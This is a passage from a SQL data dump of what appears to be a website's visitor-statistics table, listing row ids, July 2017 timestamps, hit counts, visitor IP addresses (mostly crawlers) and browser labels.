236','other'),(137754,1501114832,1,1,0,0,'51.255.65.57','other'),(137755,1501115122,1,1,0,0,'5.45.207.56','other'),(137756,1501115551,1,1,0,0,'5.45.207.64','other'),(137757,1501115564,1,1,0,0,'51.255.65.24','other'),(137758,1501116563,1,1,0,0,'216.244.66.246','other'),(137759,1501116741,1,1,0,0,'217.182.132.156','other'),(137760,1501117381,1,1,0,0,'213.180.203.21','other'),(137761,1501117656,1,1,0,0,'188.255.22.154','msie'),(137762,1501117745,1,1,0,0,'95.108.181.69','other'),(137763,1501117772,1,1,0,0,'213.180.203.32','other'),(137764,1501118079,1,1,0,0,'217.182.132.61','other'),(137765,1501118206,1,1,0,0,'217.182.132.185','other'),(137766,1501118963,1,1,0,0,'95.108.181.69','other'),(137767,1501119050,1,1,0,0,'51.255.65.86','other'),(137768,1501119110,1,1,0,0,'51.255.65.81','other'),(137769,1501119277,2,2,0,0,'178.154.171.18','other'),(137770,1501119667,1,1,0,0,'95.108.181.52','other'),(137771,1501119836,1,1,0,0,'178.154.171.45','other'),(137772,1501119871,2,2,0,0,'5.45.207.56','other'),(137773,1501120142,1,1,0,0,'95.108.181.58','other'),(137774,1501120264,1,0,1,0,'66.249.76.131',''),(137775,1501120334,1,1,0,0,'91.209.11.236','other'),(137776,1501120724,1,1,0,0,'51.255.65.2','other'),(137777,1501120736,1,1,0,0,'5.45.207.57','other'),(137778,1501121538,3,3,0,0,'216.244.66.246','other'),(137779,1501121810,1,1,0,0,'51.255.65.92','other'),(137780,1501122289,1,0,1,0,'66.249.76.131',''),(137781,1501122431,1,1,0,0,'8.29.198.25','other'),(137782,1501122530,1,1,0,0,'51.255.65.96','other'),(137783,1501122900,1,1,0,0,'178.154.171.3','other'),(137784,1501123238,1,1,0,0,'217.182.132.88','other'),(137785,1501123315,3,3,0,0,'216.244.66.194','other'),(137786,1501123746,1,1,0,0,'217.182.132.76','other'),(137787,1501123852,2,2,0,0,'91.209.11.236','other'),(137788,1501124206,1,1,0,0,'217.182.132.55','other'),(137789,1501124657,1,1,0,0,'213.180.203.21','other'),(137790,1501124763,1,1,0,0,'51.255.65.32','other'),(137791,1501125057,1,1,0,0,'217.182.132.178','other'),(137792,1501125089,1,1,0,0,'5.45.207.66','other'),(137793,1501125218,1,1,0,0,'51.255.71.100','other'),(137794,1501125593,1,1,0,0,'5.45.207.56','other'),(137795,1501125799,1,1,0,0,'213.180.203.14','other'),(137796,1501125879,1,1,0,0,'51.255.71.129','other'),(137797,1501126214,1,1,0,0,'51.255.71.132','other'),(137798,1501126472,1,0,1,0,'68.180.230.48',''),(137799,1501127752,3,3,0,0,'216.244.66.246','other'),(137800,1501128460,1,1,0,0,'49.147.26.37','firefox'),(137801,1501128918,3,3,0,0,'216.244.66.194','other'),(137802,1501129410,1,1,0,0,'5.45.207.66','other'),(137803,1501129510,1,1,0,0,'213.180.203.43','other'),(137804,1501129591,1,1,0,0,'95.108.181.69','other'),(137805,1501130013,1,1,0,0,'51.255.65.36','other'),(137806,1501130143,1,1,0,0,'207.46.13.81','other'),(137807,1501130282,1,1,0,0,'91.196.178.66','firefox'),(137808,1501130674,1,1,0,0,'213.180.203.42','other'),(137809,1501130937,1,1,0,0,'151.80.27.116','other'),(137810,1501131045,1,1,0,0,'5.45.207.57','other'),(137811,1501131082,1,1,0,0,'51.255.65.87','other'),(137812,1501131134,1,1,0,0,'51.255.65.79','other'),(137813,1501131162,1,1,0,0,'137.74.203.194','other'),(137814,1501131414,1,1,0,0,'51.255.65.97','other'),(137815,1501131727,1,1,0,0,'213.180.203.25','other'),(137816,1501131858,1,1,0,0,'51.255.65.82','other'),(137817,1501132167,1,1,0,0,'207.46.13.81','other'),(137818,1501132524,1,1,0,0,'178.154.171.3','other'),(137819,1501132721,1,1,0,0,'37.9.113.94','other'),(137820,1501132771,1,1,0,0,'164.132.162.188','other'),(137821,1501132989,1,1,0,0,'217.182.132.240','other'),(137822,1501133273,1,1,0,0,'8.29.198.27','other'),(137823,1501133391,1,1,0,0,'213.180.203.25','other'),(137824,1501133419,1,1,0,0,'207.46.13.81','other'),(137825,1501133731,5,5,0,0,'216.244.66.246','other'),(137826,1501134050,1,1,0,0,'213.180.203.21','other'),(137827,1501134268,1,1,0,0,'91.196.178.67','chrome'),(137828,1501134433,1,1,0,0,'213.180.203.43','other'),(137829,1501134512,1,1,0,0,'51.255.65.44','other'),(137830,1501134831,1,1,0,0,'180.76.15.20','other'),(137831,1501134942,2,2,0,0,'213.180.203.14','other'),(137832,1501135212,1,1,0,0,'91.196.178.69','firefox'),(137833,1501135493,1,1,0,0,'51.255.65.95','other'),(137834,1501135619,1,1,0,0,'216.244.66.194','other'),(137835,1501135820,1,1,0,0,'157.55.39.87','other'),(137836,1501136075,1,1,0,0,'37.9.113.138','other'),(137837,1501136423,1,1,0,0,'91.209.11.236','other'),(137838,1501136547,1,1,0,0,'217.182.132.54','other'),(137839,1501136729,1,1,0,0,'217.182.132.65','other'),(137840,1501136995,1,1,0,0,'217.182.132.190','other'),(137841,1501136996,1,1,0,0,'51.255.65.90','other'),(137842,1501137047,1,1,0,0,'51.255.65.43','other'),(137843,1501137330,1,1,0,0,'51.255.71.101','other'),(137844,1501137988,1,1,0,0,'95.108.181.57','other'),(137845,1501138289,1,0,1,0,'68.180.230.48',''),(137846,1501138331,1,1,0,0,'66.249.76.91','chrome'),(137847,1501138483,1,1,0,0,'5.83.23.3','chrome'),(137848,1501138520,1,1,0,0,'91.196.178.166','chrome'),(137849,1501138741,1,1,0,0,'51.255.65.24','other'),(137850,1501138810,3,3,0,0,'216.244.66.246','other'),(137851,1501138838,1,1,0,0,'213.180.203.42','other'),(137852,1501138868,1,1,0,0,'51.255.71.133','other'),(137853,1501139266,1,1,0,0,'66.102.9.27','chrome'),(137854,1501139417,1,1,0,0,'217.182.132.190','other'),(137855,1501140110,5,5,0,0,'216.244.66.194','other'),(137856,1501140124,2,2,0,0,'69.30.234.2','other'),(137857,1501140324,1,1,0,0,'217.182.132.28','other'),(137858,1501140380,1,1,0,0,'51.255.65.54','other'),(137859,1501140585,1,1,0,0,'51.255.71.118','other'),(137860,1501140588,1,1,0,0,'95.108.181.63','other'),(137861,1501141540,1,1,0,0,'178.154.171.3','other'),(137862,1501142089,1,1,0,0,'91.196.178.68','chrome'),(137863,1501142338,1,1,0,0,'217.182.132.241','other'),(137864,1501142352,1,1,0,0,'164.132.162.155','other'),(137865,1501142390,3,3,0,0,'216.244.66.246','other'),(137866,1501142528,1,1,0,0,'164.132.162.157','other'),(137867,1501142607,1,1,0,0,'217.182.132.87','other'),(137868,1501142833,1,1,0,0,'91.196.178.67','chrome'),(137869,1501143233,1,1,0,0,'216.244.66.237','other'),(137870,1501143641,1,1,0,0,'91.209.11.236','other'),(137871,1501143798,1,1,0,0,'37.9.113.78','other'),(137872,1501143905,1,1,0,0,'37.9.113.94','other'),(137873,1501144106,1,1,0,0,'8.29.198.25','other'),(137874,1501144290,1,1,0,0,'66.249.76.89','chrome'),(137875,1501144306,1,1,0,0,'217.182.132.92','other'),(137876,1501144346,1,1,0,0,'46.161.9.39','chrome'),(137877,1501144433,1,1,0,0,'66.249.66.74','chrome'),(137878,1501144574,1,1,0,0,'95.108.181.52','other'),(137879,1501144575,1,0,1,0,'68.180.231.23',''),(137880,1501144588,1,1,0,0,'51.255.65.31','other'),(137881,1501144844,1,1,0,0,'176.31.231.10','other'),(137882,1501145220,1,1,0,0,'91.209.11.236','other'),(137883,1501145327,1,1,0,0,'217.182.132.23','other'),(137884,1501145605,1,1,0,0,'37.115.109.129','chrome'),(137885,1501145662,1,1,0,0,'37.9.113.138','other'),(137886,1501145726,1,1,0,0,'217.182.132.83','other'),(137887,1501146035,3,3,0,0,'216.244.66.246','other'),(137888,1501146280,1,1,0,0,'95.221.246.83','msie'),(137889,1501146324,1,1,0,0,'66.249.76.91','chrome'),(137890,1501146348,1,1,0,0,'95.108.181.57','other'),(137891,1501146671,2,2,0,0,'95.108.181.60','other'),(137892,1501146928,1,1,0,0,'5.45.207.66','other'),(137893,1501146990,1,1,0,0,'178.154.171.59','other'),(137894,1501147288,9,9,0,0,'216.244.66.194','other'),(137895,1501147311,1,1,0,0,'37.115.109.129','chrome'),(137896,1501147694,1,1,0,0,'95.108.181.52','other'),(137897,1501147853,1,1,0,0,'178.154.171.72','other'),(137898,1501148159,1,0,1,0,'66.249.76.137',''),(137899,1501148751,1,1,0,0,'54.165.59.7','other'),(137900,1501148884,1,1,0,0,'37.73.222.101','chrome'),(137901,1501149203,1,1,0,0,'217.182.132.69','other'),(137902,1501149459,1,1,0,0,'217.182.132.81','other'),(137903,1501149700,1,1,0,0,'178.154.171.18','other'),(137904,1501149895,1,1,0,0,'51.255.71.131','other'),(137905,1501150073,2,2,0,0,'95.132.39.145','chrome'),(137906,1501150305,1,1,0,0,'217.182.132.72','other'),(137907,1501150315,2,2,0,0,'51.255.65.29','other'),(137908,1501150334,1,1,0,0,'37.9.113.78','other'),(137909,1501150353,1,1,0,0,'213.180.203.32','other'),(137910,1501150359,1,1,0,0,'51.255.65.54','other'),(137911,1501150539,1,1,0,0,'217.182.132.65','other'),(137912,1501150857,1,1,0,0,'213.180.203.18','other'),(137913,1501151175,1,1,0,0,'217.182.132.76','other'),(137914,1501151323,1,1,0,0,'92.113.127.91','chrome'),(137915,1501151349,1,1,0,0,'5.45.207.66','other'),(137916,1501151407,1,1,0,0,'51.255.65.41','other'),(137917,1501151645,1,1,0,0,'213.180.203.42','other'),(137918,1501151703,1,1,0,0,'66.249.66.76','chrome'),(137919,1501152103,1,1,0,0,'95.59.44.15','chrome'),(137920,1501152128,2,2,0,0,'216.244.66.246','other'),(137921,1501152261,1,1,0,0,'213.180.203.14','other'),(137922,1501152308,1,1,0,0,'91.209.11.236','other'),(137923,1501152344,1,1,0,0,'91.196.178.72','firefox'),(137924,1501152404,1,1,0,0,'217.182.132.35','other'),(137925,1501153460,1,1,0,0,'95.108.181.52','other'),(137926,1501153496,1,1,0,0,'217.182.132.80','other'),(137927,1501153549,1,1,0,0,'51.255.65.40','other'),(137928,1501153908,1,1,0,0,'46.200.38.42','chrome'),(137929,1501154152,1,1,0,0,'37.9.113.128','other'),(137930,1501154299,1,1,0,0,'137.74.207.109','other'),(137931,1501154437,2,2,0,0,'91.209.11.236','other'),(137932,1501154535,1,1,0,0,'164.132.162.156','other'),(137933,1501154723,2,2,0,0,'37.9.113.138','other'),(137934,1501154943,1,1,0,0,'8.29.198.27','other'),(137935,1501154979,1,0,1,0,'66.249.76.91',''),(137936,1501155131,1,1,0,0,'5.45.207.83','other'),(137937,1501155495,1,1,0,0,'213.180.203.42','other'),(137938,1501155641,6,6,0,0,'216.244.66.246','other'),(137939,1501155700,1,0,1,0,'66.249.76.93',''),(137940,1501155900,1,1,0,0,'207.46.13.133','other'),(137941,1501155952,1,1,0,0,'95.132.40.130','chrome'),(137942,1501156169,1,1,0,0,'82.145.220.135','other'),(137943,1501156397,1,1,0,0,'95.132.6.203','firefox'),(137944,1501157447,1,1,0,0,'46.201.175.91','firefox'),(137945,1501157565,1,1,0,0,'51.255.65.40','other'),(137946,1501157774,8,8,0,0,'216.244.66.194','other'),(137947,1501157822,1,1,0,0,'66.249.76.131','chrome'),(137948,1501157898,1,1,0,0,'217.182.132.83','other'),(137949,1501158190,1,1,0,0,'51.255.65.71','other'),(137950,1501158676,1,1,0,0,'213.180.203.18','other'),(137951,1501158775,1,0,1,0,'66.249.76.137',''),(137952,1501159114,2,2,0,0,'37.9.113.78','other'),(137953,1501159175,1,1,0,0,'95.108.181.60','other'),(137954,1501159349,1,1,0,0,'217.182.132.190','other'),(137955,1501159364,1,1,0,0,'217.69.133.2','other'),(137956,1501159538,1,1,0,0,'37.9.113.94','other'),(137957,1501159782,1,1,0,0,'157.55.39.87','other'),(137958,1501160137,1,1,0,0,'217.182.132.69','other'),(137959,1501160281,1,1,0,0,'91.196.178.68','chrome'),(137960,1501160369,2,2,0,0,'37.52.20.140','chrome'),(137961,1501160521,1,1,0,0,'217.77.209.134','firefox'),(137962,1501160682,1,1,0,0,'46.201.175.91','firefox'),(137963,1501161105,1,1,0,0,'217.182.132.58','other'),(137964,1501161156,1,1,0,0,'92.113.136.113','chrome'),(137965,1501161438,1,1,0,0,'51.255.65.85','other'),(137966,1501161710,4,4,0,0,'216.244.66.194','other'),(137967,1501161857,1,1,0,0,'5.45.207.66','other'),(137968,1501162270,1,1,0,0,'92.113.34.193','chrome'),(137969,1501162340,1,1,0,0,'95.108.181.63','other'),(137970,1501162460,1,1,0,0,'80.254.155.43','chrome'),(137971,1501162561,1,1,0,0,'217.182.132.35','other'),(137972,1501162639,2,2,0,0,'157.55.39.87','other'),(137973,1501162768,1,1,0,0,'217.182.132.34','other'),(137974,1501162880,1,1,0,0,'217.182.132.25','other'),(137975,1501162990,8,8,0,0,'216.244.66.246','other'),(137976,1501163220,1,1,0,0,'51.255.65.91','other'),(137977,1501163526,1,1,0,0,'91.209.11.236','other'),(137978,1501163639,1,1,0,0,'51.255.65.95','other'),(137979,1501164062,1,1,0,0,'46.201.175.91','firefox'),(137980,1501164138,1,1,0,0,'217.182.132.77','other'),(137981,1501164310,1,1,0,0,'213.180.203.21','other'),(137982,1501164385,1,1,0,0,'217.182.132.76','other'),(137983,1501165000,8,8,0,0,'216.244.66.194','other'),(137984,1501165027,1,1,0,0,'216.244.66.237','other'),(137985,1501165057,1,1,0,0,'213.180.203.43','other'),(137986,1501165109,1,1,0,0,'178.154.171.45','other'),(137987,1501165270,1,1,0,0,'137.74.207.102','other'),(137988,1501165296,1,1,0,0,'46.174.163.134','chrome'),(137989,1501165537,1,1,0,0,'54.165.59.7','other'),(137990,1501165598,1,1,0,0,'95.108.181.57','other'),(137991,1501165673,1,1,0,0,'37.55.225.182','chrome'),(137992,1501165680,1,1,0,0,'217.182.132.81','other'),(137993,1501165780,1,1,0,0,'8.29.198.26','other'),(137994,1501165839,1,1,0,0,'5.45.207.64','other'),(137995,1501165946,1,1,0,0,'217.182.132.154','other'),(137996,1501166196,1,1,0,0,'51.255.65.70','other'),(137997,1501166197,1,1,0,0,'217.182.132.32','other'),(137998,1501166214,1,0,1,0,'66.249.76.131',''),(137999,1501166445,1,1,0,0,'217.182.132.78','other'),(138000,1501167066,1,1,0,0,'213.180.203.32','other'),(138001,1501167754,1,1,0,0,'217.182.132.153','other'),(138002,1501167925,3,3,0,0,'95.158.189.118','other'),(138003,1501167979,5,5,0,0,'192.187.123.162','other'),(138004,1501168478,1,1,0,0,'217.182.132.24','other'),(138005,1501168573,1,1,0,0,'37.9.113.78','other'),(138006,1501168969,1,1,0,0,'137.74.207.110','other'),(138007,1501169615,1,1,0,0,'213.180.203.25','other'),(138008,1501169703,1,1,0,0,'51.255.65.42','other'),(138009,1501169829,1,1,0,0,'91.196.178.163','chrome'),(138010,1501170323,1,1,0,0,'217.182.132.91','other'),(138011,1501170343,1,1,0,0,'46.161.9.39','chrome'),(138012,1501170564,9,9,0,0,'216.244.66.194','other'),(138013,1501170864,1,0,1,0,'66.249.76.137',''),(138014,1501170951,1,1,0,0,'217.182.132.88','other'),(138015,1501171043,1,1,0,0,'51.255.65.82','other'),(138016,1501171100,1,1,0,0,'188.166.86.10','chrome'),(138017,1501171557,1,1,0,0,'95.108.181.63','other'),(138018,1501171559,1,0,1,0,'66.249.66.157',''),(138019,1501171565,1,1,0,0,'51.255.71.113','other'),(138020,1501171611,1,1,0,0,'213.180.203.42','other'),(138021,1501171747,1,1,0,0,'216.244.66.237','other'),(138022,1501171773,1,1,0,0,'91.209.11.236','other'),(138023,1501172015,1,1,0,0,'51.255.65.97','other'),(138024,1501172289,1,1,0,0,'217.182.132.7','other'),(138025,1501172510,1,1,0,0,'217.182.132.86','other'),(138026,1501172593,8,8,0,0,'216.244.66.194','other'),(138027,1501172748,1,0,1,0,'66.249.66.75',''),(138028,1501173117,1,1,0,0,'51.255.65.38','other'),(138029,1501173267,2,2,0,0,'216.244.66.246','other'),(138030,1501173443,1,1,0,0,'157.55.39.91','other'),(138031,1501173498,2,2,0,0,'91.209.11.236','other'),(138032,1501173747,1,1,0,0,'178.154.171.18','other'),(138033,1501174015,1,1,0,0,'217.182.132.173','other'),(138034,1501174343,1,1,0,0,'5.45.207.64','other'),(138035,1501174469,1,1,0,0,'5.45.207.66','other'),(138036,1501174478,1,1,0,0,'95.108.181.57','other'),(138037,1501175100,1,1,0,0,'178.154.171.3','other'),(138038,1501175151,1,1,0,0,'46.161.9.39','chrome'),(138039,1501175335,4,4,0,0,'216.244.66.246','other'),(138040,1501175442,1,1,0,0,'213.180.203.18','other'),(138041,1501176031,1,1,0,0,'178.154.171.53','other'),(138042,1501176354,1,1,0,0,'51.255.65.97','other'),(138043,1501176440,1,0,1,0,'66.249.66.155',''),(138044,1501176493,1,1,0,0,'217.182.132.59','other'),(138045,1501176622,1,1,0,0,'8.29.198.25','other'),(138046,1501176820,1,1,0,0,'37.9.113.138','other'),(138047,1501177275,1,0,1,0,'66.249.66.74',''),(138048,1501177419,1,1,0,0,'217.182.132.146','other'),(138049,1501177784,1,1,0,0,'207.46.13.186','other'),(138050,1501178558,1,1,0,0,'188.230.32.226','chrome'),(138051,1501178679,1,1,0,0,'217.182.132.155','other'),(138052,1501178925,1,1,0,0,'51.255.65.93','other'),(138053,1501179104,2,2,0,0,'91.209.11.236','other'),(138054,1501179458,1,1,0,0,'51.255.65.52','other'),(138055,1501179475,1,1,0,0,'217.182.132.174','other'),(138056,1501179540,1,1,0,0,'217.182.132.183','other'),(138057,1501179762,1,1,0,0,'51.255.71.101','other'),(138058,1501180143,2,2,0,0,'95.132.161.78','other'),(138059,1501180157,1,0,1,0,'68.180.230.48',''),(138060,1501180382,1,1,0,0,'51.255.65.11','other'),(138061,1501180468,1,1,0,0,'51.255.65.7','other'),(138062,1501180800,3,3,0,0,'216.244.66.194','other'),(138063,1501180813,1,1,0,0,'217.182.132.19','other'),(138064,1501180823,1,1,0,0,'51.255.65.38','other'),(138065,1501181141,1,1,0,0,'137.74.201.99','other'),(138066,1501181456,1,1,0,0,'5.45.207.83','other'),(138067,1501181617,1,1,0,0,'5.45.207.57','other'),(138068,1501181773,2,2,0,0,'207.46.13.101','other'),(138069,1501181836,1,1,0,0,'95.108.181.63','other'),(138070,1501181898,1,1,0,0,'217.182.132.182','other'),(138071,1501182178,1,1,0,0,'37.9.113.128','other'),(138072,1501182387,1,1,0,0,'51.255.65.13','other'),(138073,1501182561,6,6,0,0,'216.244.66.246','other'),(138074,1501182613,1,1,0,0,'91.209.11.236','other'),(138075,1501182635,1,1,0,0,'51.255.65.5','other'),(138076,1501182764,1,1,0,0,'178.154.171.3','other'),(138077,1501183306,1,1,0,0,'217.182.132.4','other'),(138078,1501183490,1,1,0,0,'51.255.65.224','other'),(138079,1501183550,1,1,0,0,'217.182.132.23','other'),(138080,1501183711,1,1,0,0,'51.255.71.121','other'),(138081,1501183846,1,1,0,0,'95.108.181.60','other'),(138082,1501184807,1,1,0,0,'51.255.65.94','other'),(138083,1501185204,1,1,0,0,'178.154.171.3','other'),(138084,1501185756,1,1,0,0,'217.182.132.184','other'),(138085,1501185765,1,1,0,0,'95.108.181.57','other'),(138086,1501185823,1,1,0,0,'91.196.178.38','chrome'),(138087,1501185990,1,1,0,0,'164.132.162.158','other'),(138088,1501186177,6,6,0,0,'216.244.66.246','other'),(138089,1501186196,1,1,0,0,'164.132.162.157','other'),(138090,1501186224,1,1,0,0,'217.182.132.170','other'),(138091,1501186388,1,1,0,0,'137.74.207.159','other'),(138092,1501186462,1,1,0,0,'217.182.132.50','other'),(138093,1501186615,1,1,0,0,'213.180.203.18','other'),(138094,1501187048,1,1,0,0,'207.46.13.186','other'),(138095,1501187301,1,1,0,0,'51.255.71.110','other'),(138096,1501187449,1,1,0,0,'8.29.198.27','other'),(138097,1501187477,1,1,0,0,'95.108.181.58','other'),(138098,1501187501,1,1,0,0,'217.182.132.78','other'),(138099,1501187508,1,1,0,0,'217.182.132.85','other'),(138100,1501187522,1,0,1,0,'66.249.76.137',''),(138101,1501187673,2,0,2,0,'66.249.66.157',''),(138102,1501187725,1,1,0,0,'51.255.65.39','other'),(138103,1501187805,1,1,0,0,'217.182.132.95','other'),(138104,1501187825,1,1,0,0,'213.180.203.21','other'),(138105,1501187831,1,1,0,0,'66.249.76.137','chrome'),(138106,1501187879,1,1,0,0,'51.255.65.14','other'),(138107,1501187881,1,1,0,0,'217.182.132.191','other'),(138108,1501188183,1,1,0,0,'66.249.76.93','chrome'),(138109,1501188526,1,1,0,0,'157.55.39.91','other'),(138110,1501188766,1,1,0,0,'216.244.66.194','other'),(138111,1501189384,1,1,0,0,'66.249.76.93','chrome'),(138112,1501189403,1,1,0,0,'207.46.13.101','other'),(138113,1501189417,1,1,0,0,'51.255.65.11','other'),(138114,1501190228,1,1,0,0,'51.255.65.52','other'),(138115,1501190372,1,0,1,0,'66.249.76.131',''),(138116,1501190544,1,1,0,0,'213.180.203.42','other'),(138117,1501190563,1,1,0,0,'91.209.11.236','other'),(138118,1501190638,1,1,0,0,'213.180.203.25','other'),(138119,1501190890,1,1,0,0,'37.9.113.94','other'),(138120,1501191213,1,1,0,0,'213.180.203.14','other'),(138121,1501191431,1,1,0,0,'217.182.132.170','other'),(138122,1501191583,1,1,0,0,'66.249.76.131','chrome'),(138123,1501191797,1,1,0,0,'207.46.13.186','other'),(138124,1501191836,1,1,0,0,'180.76.15.18','other'),(138125,1501191879,1,1,0,0,'217.182.132.175','other'),(138126,1501191952,1,1,0,0,'137.74.207.170','other'),(138127,1501192112,1,1,0,0,'217.182.132.85','other'),(138128,1501192192,1,1,0,0,'91.209.11.236','other'),(138129,1501192224,1,1,0,0,'5.45.207.56','other'),(138130,1501192506,1,1,0,0,'95.108.181.69','other'),(138131,1501192695,1,1,0,0,'51.255.65.24','other'),(138132,1501192743,5,5,0,0,'216.244.66.194','other'),(138133,1501193018,1,1,0,0,'51.255.65.69','other'),(138134,1501193099,1,1,0,0,'178.154.171.3','other'),(138135,1501193114,1,1,0,0,'216.244.66.246','other'),(138136,1501193596,1,1,0,0,'51.255.71.133','other'),(138137,1501193721,1,1,0,0,'66.249.76.137','chrome'),(138138,1501193793,1,1,0,0,'213.180.203.42','other'),(138139,1501194309,1,1,0,0,'91.209.11.236','other'),(138140,1501194313,1,1,0,0,'217.182.132.65','other'),(138141,1501194488,1,1,0,0,'217.182.132.182','other'),(138142,1501194994,1,1,0,0,'217.182.132.35','other'),(138143,1501195129,1,1,0,0,'217.69.133.203','other'),(138144,1501195473,1,1,0,0,'137.74.207.116','other'),(138145,1501195954,2,2,0,0,'178.154.171.53','other'),(138146,1501195986,1,1,0,0,'37.9.113.78','other'),(138147,1501196554,1,1,0,0,'51.255.71.121','other'),(138148,1501196713,1,1,0,0,'51.255.65.80','other'),(138149,1501196850,1,1,0,0,'217.182.132.91','other'),(138150,1501196901,1,1,0,0,'51.255.65.24','other'),(138151,1501197607,1,0,1,0,'66.249.66.75',''),(138152,1501197608,1,1,0,0,'217.69.133.9','other'),(138153,1501197728,1,1,0,0,'91.209.11.236','other'),(138154,1501197821,5,5,0,0,'216.244.66.246','other'),(138155,1501198045,1,1,0,0,'137.74.207.101','other'),(138156,1501198279,1,1,0,0,'217.182.132.63','other'),(138157,1501198284,1,1,0,0,'8.29.198.25','other'),(138158,1501198445,1,1,0,0,'213.180.203.14','other'),(138159,1501199269,1,1,0,0,'66.249.76.93','chrome'),(138160,1501199651,1,1,0,0,'37.9.113.78','other'),(138161,1501200079,1,1,0,0,'217.182.132.173','other'),(138162,1501200176,1,0,1,0,'66.249.66.156',''),(138163,1501200440,1,1,0,0,'213.180.203.42','other'),(138164,1501200466,1,1,0,0,'5.45.207.56','other'),(138165,1501200653,1,1,0,0,'217.182.132.60','other'),(138166,1501201046,1,1,0,0,'217.182.132.184','other'),(138167,1501201108,1,1,0,0,'213.180.203.18','other'),(138168,1501201157,1,1,0,0,'217.182.132.79','other'),(138169,1501201334,1,0,1,0,'66.249.66.156',''),(138170,1501201443,2,2,0,0,'91.209.11.236','other'),(138171,1501201537,1,1,0,0,'51.255.65.82','other'),(138172,1501201807,1,1,0,0,'178.154.171.59','other'),(138173,1501202175,1,1,0,0,'66.249.76.131','chrome'),(138174,1501202462,1,1,0,0,'207.46.13.101','other'),(138175,1501202577,1,1,0,0,'178.154.171.42','other'),(138176,1501202868,1,1,0,0,'91.209.11.236','other'),(138177,1501202881,3,3,0,0,'216.244.66.194','other'),(138178,1501203059,1,1,0,0,'213.180.203.42','other'),(138179,1501203234,1,1,0,0,'37.9.113.138','other'),(138180,1501203317,1,1,0,0,'213.180.203.18','other'),(138181,1501203743,2,2,0,0,'216.244.66.246','other'),(138182,1501203823,1,1,0,0,'217.182.132.67','other'),(138183,1501203876,3,3,0,0,'216.244.66.194','other'),(138184,1501204009,1,1,0,0,'137.74.201.100','other'),(138185,1501204208,1,1,0,0,'217.182.132.240','other'),(138186,1501204223,1,1,0,0,'51.255.65.21','other'),(138187,1501204426,1,1,0,0,'37.9.113.94','other'),(138188,1501204691,1,1,0,0,'207.46.13.101','other'),(138189,1501205374,1,1,0,0,'91.209.11.236','other'),(138190,1501205613,1,1,0,0,'37.9.113.94','other'),(138191,1501205832,1,0,1,0,'66.249.76.131',''),(138192,1501205936,1,1,0,0,'213.180.203.32','other'),(138193,1501206198,1,1,0,0,'180.76.15.142','other'),(138194,1501206474,1,1,0,0,'37.9.113.128','other'),(138195,1501206648,1,1,0,0,'51.255.71.101','other'),(138196,1501206677,1,1,0,0,'217.182.132.180','other'),(138198,1501207035,1,1,0,0,'95.108.181.63','other'),(138199,1501207134,1,1,0,0,'217.182.132.175','other'),(138200,1501207357,1,1,0,0,'178.154.171.18','other'),(138201,1501207634,1,1,0,0,'217.182.132.82','other'),(138202,1501207704,1,1,0,0,'216.244.66.246','other'),(138203,1501208082,1,1,0,0,'151.80.27.118','other'),(138204,1501208678,1,1,0,0,'51.255.71.120','other'),(138205,1501208849,1,1,0,0,'178.154.171.59','other'),(138206,1501208854,1,1,0,0,'207.46.13.151','other'),(138207,1501208885,1,1,0,0,'95.108.181.63','other'),(138208,1501208888,1,1,0,0,'5.45.207.56','other'),(138209,1501209123,1,1,0,0,'8.29.198.27','other'),(138210,1501210088,1,1,0,0,'217.182.132.65','other'),(138211,1501210288,2,2,0,0,'91.209.11.236','other'),(138212,1501210910,1,1,0,0,'51.255.65.71','other'),(138213,1501210921,1,0,1,0,'66.249.66.155',''),(138214,1501210979,1,1,0,0,'213.180.203.18','other'),(138215,1501211195,1,1,0,0,'5.45.207.57','other'),(138216,1501211289,1,1,0,0,'95.108.181.63','other'),(138217,1501212616,1,1,0,0,'217.182.132.91','other'),(138218,1501212834,1,1,0,0,'37.9.113.78','other'),(138219,1501213264,1,1,0,0,'51.255.65.26','other'),(138220,1501213466,1,1,0,0,'51.255.71.118','other'),(138221,1501213790,4,4,0,0,'216.244.66.194','other'),(138222,1501213820,1,1,0,0,'217.182.132.71','other'),(138223,1501214345,1,1,0,0,'178.154.171.3','other'),(138224,1501214450,1,1,0,0,'95.108.181.52','other'),(138225,1501214587,1,1,0,0,'91.209.11.236','other'),(138226,1501214663,3,3,0,0,'54.165.59.7','other'),(138227,1501214722,1,1,0,0,'95.108.181.58','other'),(138228,1501214805,1,1,0,0,'51.255.65.51','other'),(138229,1501214869,1,1,0,0,'217.69.133.5','other'),(138230,1501215484,3,3,0,0,'216.244.66.194','other'),(138231,1501215570,1,1,0,0,'37.9.113.78','other'),(138232,1501215880,1,1,0,0,'91.209.11.236','other'),(138233,1501216018,1,1,0,0,'213.180.203.21','other'),(138234,1501216049,1,1,0,0,'213.180.203.25','other'),(138235,1501216201,1,1,0,0,'207.46.13.151','other'),(138236,1501216391,1,1,0,0,'51.255.65.13','other'),(138237,1501217222,3,3,0,0,'216.244.66.246','other'),(138238,1501217276,1,1,0,0,'91.196.178.71','firefox'),(138239,1501217578,1,1,0,0,'66.249.66.157','chrome'),(138240,1501217883,1,1,0,0,'91.209.11.236','other'),(138241,1501218052,1,1,0,0,'37.9.113.78','other'),(138242,1501218087,1,1,0,0,'95.108.181.58','other'),(138243,1501218101,1,1,0,0,'217.182.132.148','other'),(138244,1501218421,1,1,0,0,'213.180.203.43','other'),(138245,1501219131,3,3,0,0,'216.244.66.246','other'),(138246,1501219227,1,1,0,0,'95.108.181.60','other'),(138247,1501219618,1,1,0,0,'217.182.132.241','other'),(138248,1501219956,1,1,0,0,'8.29.198.27','other'),(138249,1501220667,1,1,0,0,'157.55.39.91','other'),(138250,1501220939,2,2,0,0,'91.196.178.72','chrome'),(138251,1501220968,4,4,0,0,'216.244.66.194','other'),(138252,1501221034,1,1,0,0,'217.182.132.66','other'),(138253,1501221145,1,1,0,0,'5.45.207.66','other'),(138254,1501221254,1,1,0,0,'217.182.132.4','other'),(138255,1501222114,1,1,0,0,'37.9.113.138','other'),(138256,1501222313,1,1,0,0,'217.69.133.2','other'),(138257,1501222316,1,1,0,0,'217.182.132.80','other'),(138258,1501222593,1,1,0,0,'51.255.65.16','other'),(138259,1501222852,1,1,0,0,'217.182.132.78','other'),(138260,1501222913,1,1,0,0,'5.45.207.56','other'),(138261,1501223166,1,1,0,0,'185.137.18.232','chrome'),(138262,1501223210,1,1,0,0,'195.10.210.49','chrome'),(138263,1501223803,1,1,0,0,'91.209.11.236','other'),(138264,1501223917,1,1,0,0,'94.179.58.92','chrome'),(138265,1501223955,1,1,0,0,'207.46.13.95','other'),(138266,1501224017,10,10,0,0,'216.244.66.194','other'),(138267,1501224665,1,1,0,0,'178.154.171.18','other'),(138268,1501224911,1,1,0,0,'37.9.113.94','other'